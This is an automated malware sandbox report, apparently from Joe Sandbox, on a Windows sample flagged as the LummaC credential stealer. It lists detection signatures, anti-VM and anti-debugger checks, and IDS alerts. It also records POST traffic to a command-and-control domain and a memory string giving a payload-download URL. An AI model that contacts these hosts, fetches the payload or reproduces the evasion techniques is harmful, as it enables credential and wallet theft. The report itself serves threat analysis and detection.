
Windows Analysis Report
Qyk8RJnGN7.exe

Overview

General Information

Sample name: Qyk8RJnGN7.exe (renamed because original name is a hash value)
Original sample name: 880af66f46621859f8330e966419e8cf.exe
Analysis ID: 1647734
MD5: 880af66f46621859f8330e966419e8cf
SHA1: ce5975e4ecf122b6463f0468e27511fa0ec3f497
SHA256: fe9333e5bbe2789f4ac7c4f7d084baf1e4d38d53c3f11ca56116cc6f6dfc9382
Tags: exe, user-abuse_ch

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

[Classification chart: categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale clean / suspicious / malicious]
  • System is w10x64
  • Qyk8RJnGN7.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\Qyk8RJnGN7.exe" MD5: 880AF66F46621859F8330E966419E8CF)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
    No Sigma rule has matched
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-03-25T08:16:41.089875+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49681 | 104.21.112.1 | 443 | TCP
    2025-03-25T08:16:42.812374+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49682 | 104.21.112.1 | 443 | TCP
    2025-03-25T08:16:43.964393+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49683 | 104.21.112.1 | 443 | TCP
    2025-03-25T08:16:45.016095+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49684 | 104.21.112.1 | 443 | TCP
    2025-03-25T08:16:47.123472+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49685 | 104.21.112.1 | 443 | TCP
    2025-03-25T08:16:48.152559+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49686 | 104.21.112.1 | 443 | TCP
    2025-03-25T08:16:49.680318+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49687 | 104.21.112.1 | 443 | TCP


    AV Detection

    Source: Qyk8RJnGN7.exe | Avira: detected
    Source: https://wxayfarer.live/ALosnzG | Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnzB | Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live/F | Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnztAw | Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live:443/ALosnz | Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnz% | Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live:443/ALosnzal | Avira URL Cloud: Label: malware
    Source: Qyk8RJnGN7.exe | Virustotal: Detection: 69%
    Source: Qyk8RJnGN7.exe | ReversingLabs: Detection: 69%
    Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: Qyk8RJnGN7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49681 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49682 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49683 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49684 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49685 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49686 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49687 version: TLS 1.2
    Source: Joe Sandbox View | IP Address: 104.21.112.1
    Source: Joe Sandbox View | IP Address: 176.113.115.7
    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49684 -> 104.21.112.1:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49682 -> 104.21.112.1:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49683 -> 104.21.112.1:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49686 -> 104.21.112.1:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49685 -> 104.21.112.1:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49687 -> 104.21.112.1:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49681 -> 104.21.112.1:443
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 51 | Host: wxayfarer.live
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=WdE9K61h266dYShr | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 14498 | Host: wxayfarer.live
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=7nIl8IbbSMd | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 15035 | Host: wxayfarer.live
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=jOQnh3r5bI1x49WdCM4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 20400 | Host: wxayfarer.live
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=C3zlAj9M | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 2509 | Host: wxayfarer.live
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=t2hEn3p4K2 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 552064 | Host: wxayfarer.live
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 89 | Host: wxayfarer.live
    Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.7
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | DNS traffic detected: DNS query: wxayfarer.live
    Source: unknown | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 51 | Host: wxayfarer.live
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/7
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/edX
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.0000000001509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/mine/random.exe
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/mine/random.exe:9x
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014A7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/mine/random.exeJ
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229503900.0000000001483000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7:80/mine/random.exerosoft
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
    Source: Qyk8RJnGN7.exe, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980354207.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.924127439.0000000001483000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980607301.00000000014F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/
    Source: Qyk8RJnGN7.exe, 00000000.00000003.973023880.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980607301.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.950076668.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.962059232.0000000001516000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.951776882.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.951070309.0000000005DBC000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.924032519.000000000149B000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.960833842.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.952660376.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.960980527.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/ALosnz
    Source: Qyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.0000000001509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/ALosnz%
    Source: Qyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/ALosnzB
    Source: Qyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/ALosnzG
    Source: Qyk8RJnGN7.exe, 00000000.00000003.980607301.0000000001509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/ALosnztAw
    Source: Qyk8RJnGN7.exe, 00000000.00000003.962059232.00000000014F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/F
    Source: Qyk8RJnGN7.exe, Qyk8RJnGN7.exe, 00000000.00000003.924127439.0000000001483000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live:443/ALosnz
    Source: Qyk8RJnGN7.exe, 00000000.00000003.980354207.0000000001483000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live:443/ALosnzal
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49687
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49686
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49685
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49684
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49683
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49682
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49681
    Source: unknown | Network traffic detected: HTTP traffic on port 49686 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49685 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49683 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49684 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49687 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49682 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49681 -> 443

    System Summary

    Source: Qyk8RJnGN7.exe | Static PE information: section name:
    Source: Qyk8RJnGN7.exe | Static PE information: section name: .idata
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Code function: 0_3_015163D8
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Code function: 0_3_014EE968
    Source: Qyk8RJnGN7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Qyk8RJnGN7.exe | Static PE information: Section: ZLIB complexity 0.998052240728022
    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/2
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929627028.0000000001527000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.940159001.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.929278362.0000000005DF8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: Qyk8RJnGN7.exe | Virustotal: Detection: 69%
    Source: Qyk8RJnGN7.exe | ReversingLabs: Detection: 69%
    Source: Qyk8RJnGN7.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: Qyk8RJnGN7.exe | String found in binary or memory: YRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeP
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File read: C:\Users\user\Desktop\Qyk8RJnGN7.exe
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: webio.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: mskeyprotect.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: dpapi.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: wbemcomn.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: amsi.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Section loaded: version.dll
    Source: Qyk8RJnGN7.exe | Static file information: File size 2930176 > 1048576
    Source: Qyk8RJnGN7.exe | Static PE information: Raw size of tjdrfttm is bigger than: 0x100000 < 0x29a200

    Data Obfuscation

    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Unpacked PE file: 0.2.Qyk8RJnGN7.exe.c90000.0.unpack :EW;.rsrc:W;.idata :W;tjdrfttm:EW;msexgfdi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tjdrfttm:EW;msexgfdi:EW;.taggant:EW;
    Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
    Source: Qyk8RJnGN7.exe | Static PE information: real checksum: 0x2d58d3 should be: 0x2d76de
    Source: Qyk8RJnGN7.exe | Static PE information: section name:
    Source: Qyk8RJnGN7.exe | Static PE information: section name: .idata
    Source: Qyk8RJnGN7.exe | Static PE information: section name: tjdrfttm
    Source: Qyk8RJnGN7.exe | Static PE information: section name: msexgfdi
    Source: Qyk8RJnGN7.exe | Static PE information: section name: .taggant
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Code function: 0_3_0150F4F0 push cs; retf 0_3_0150F4F1
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Code function: 0_3_0150A3EC push es; iretd 0_3_0150A46C
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Code function: 0_3_0150D610 push edx; iretd 0_3_0150D611
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Code function: 0_3_014D0CBF push esi; retf 0_3_014D0CCA
    Source: Qyk8RJnGN7.exe | Static PE information: section name: entropy: 7.982701324787569

    Boot Survival

    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Window searched: window name: FilemonClass
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Window searched: window name: PROCMON_WINDOW_CLASS
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Window searched: window name: RegmonClass
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Window searched: window name: Regmonclass
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Window searched: window name: Filemonclass
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Process information set: NOOPENFILEERRORBOX

